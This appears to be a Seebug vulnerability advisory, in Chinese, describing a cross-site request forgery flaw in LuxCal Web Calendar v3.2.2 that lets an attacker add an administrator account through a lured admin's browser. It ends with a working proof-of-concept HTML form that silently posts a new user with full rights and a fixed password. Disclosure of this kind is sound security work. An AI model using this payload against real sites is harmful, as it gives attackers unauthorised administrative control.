LuxCal Web Calendar跨站请求伪造漏洞

2014-03-14T00:00:00
ID SSV:61793
Type seebug
Reporter Root
Modified 2014-03-14T00:00:00

Description

LuxCal是一个免费的轻量级基于Web的事件日历。

由于应用程序允许用户通过未经验证的HTTP请求执行某些操作,攻击者可以利用漏洞欺骗管理员用户登录特制的网页,从而添加管理用户。 0 LuxCal v3.2.2 目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.luxsoft.eu/index.php?pge=home

                                        
                                            
                                                <html>
<form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add">
<input type="hidden" name="uname" value="tcyber"/>
<input type="hidden" name="email" value="g4k@hot.mail"/>
<input type="hidden" name="new_pw" value="123456"/>
<input type="hidden" name="userRights" value="9"/>
<input type='submit' name='addExe' value="Add Profile">
</form>
</html>